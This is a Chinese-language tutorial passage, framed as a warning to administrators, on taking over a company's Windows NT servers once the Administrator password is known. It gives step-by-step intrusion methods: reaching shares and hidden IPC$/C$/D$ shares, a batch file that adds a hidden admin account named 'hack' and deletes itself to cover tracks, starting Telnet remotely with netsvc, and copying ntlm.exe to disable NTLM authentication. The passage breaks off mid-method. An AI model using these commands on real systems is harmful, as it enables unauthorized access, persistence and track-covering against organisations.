现在的企业当中一般都是使用的NT系统,也不得不承认,NT系统的确是非常适合企业使用的操作系统,然而“黑客”的攻击引来了企业信息安全危机…… 得到了NT的管理员密码还能做什么,还不是想做什么就做什么呗。但到底能做什么呢?能详细答出来的只怕不会很多,而且很多企业系统管理员就认为密码为空没什么,因为他们压根就不知道“黑客”会怎么做。本文介绍的就是得到NT的管理员密码以后入侵一个企业计算机群的初级和中级手法,尤其是在一个大型企业当中,企业系统管理员的密码往往关系着整个公司的信息泄密,以及公司的数据的丢失,严重的影响到一个企业的发展和生存。 首先,我们先假定得到了某个企业的一台服务器192.168.0.1的Administrator的密码,而对方没有关闭139端口。 1.普通共享资源的入侵 这种入侵手法可说是NT最简单的入侵了。随便在自己机器的哪个窗口的地址栏里输入“\\192.168.0.1”大概等1-2秒,对方就会要求你输入用户名和密码,输入所得到的用户名和密码以后就可以进入,并可以看到这台服务器在企业中的共享资源了。由于权限是Admin所以你几乎可以删除对方共享资源里的任何东西。(如果设置了共享为只读那就没办法了) 2.默认及隐藏共享资源的入侵 在说这种入侵方法之前我先来给大家介绍一个NT的IPC$连接,在默认情况下NT系统有一个特殊的隐藏共享,就是IPC$共享。IPC$是专门用在NT中的一种管道通讯,NT系统之间的通讯大部分都在IPC$通讯中完成的。 这次手法相对高明一点,但还是很简单的。不过关键还是要看“黑客”如何利用了,有的人可能只能删删文件,有的人却可以利用这个留下后门,以便下次如果密码改变了后可以利用后门进入。同样在机器里随便打开一个窗口,在地址栏输入“\\192.168.0.1”就会要求输入密码,输入以后所看到的东西和前面介绍的一样。好了,现在同时也建立好IPC$连接了,其实在提示你输入密码时从输入窗口中也知道了是建立IPC$连接。然后我们再次在地址栏输入地址,这次输入的就有点不同了,输入“\\192.168.0.1\c$”大概过一会就出现了对方C盘里所有的内容了。想看对方D盘吗?同样,输入“\\192.168.0.1\D$”就看见对方D盘了。然后想换这个企业的主页(假如对方还是一个Web服务器)可以说是轻而易举。记住由于权限是管理员当然可以写了,留不留后门就看“黑客”的想法咯。一般他们会在C盘(假设在C:\\WINNT下)建立一个批处理文件,假设文件名为hack.bat,其内容一般为: net user hack 1234 /add (建立一个用户名为hack的用户,密码为1234) net localgroup administrators hack /add (让hack也是管理员) del C:\Documents and Settings\Administrator\开始\菜单\程序\启动\hack.lnk (删除启动文件夹里的快捷方式消除足迹) del c:\winnt\hack.bat (删除hack.bat这个文件消除足迹) 这样当企业系统管理员在下次登陆时就会偷偷的添加一个用户了。当然其实添加用户算是一个比较愚蠢的留“后门”的方法了,所以其实很多“黑客”会放一个可以常驻内存的小程序,然后建立一个类似的批处理文件和快捷方式,那么“黑客”基本上可以长期的占有企业中的这台主机了。 3.IPC$连接入侵的高级手段 然而每个“黑客”都不可能那么笨,非要一直等到下次企业系统管理员登陆以后才可以占有,往往“黑客”会使用更加巧妙的手法,迅速的留下后门。首先他们还是先建立IPC$连接,连接以后他们会使用各种手法开后门,比如打开Telnet服务,“黑客”怎么打开Telnet服务呢?其实有很多种方法,比如微软公司自己就出了一个小程序“netsvc.exe”就是专门让系统管理员在建立IPC$连接以后远程打开服务用的管理工具,但这个工具到了“黑客”手中自然也成了必不可少的“黑客”工具了。在命令符下输入“netsvc \\192.168.0.1 telnet /start”大概等5分钟对方的Telnet服务就打开了,然后“telnet 192.168.0.1”嘿嘿……等!需要NTLM验证,这下又把“黑客”拦在了外面了,这时他们又会用到一个小程序了,就是专门关闭一个NTLM验证的程序ntlm.exe。(当然也可以是其他名字)“copy ntlm.exe \\192.168.0.1\admin$\system32”把ntlm.exe复制到对方企业服务器的system32目录下。复制过去了,可怎么让他运行呢?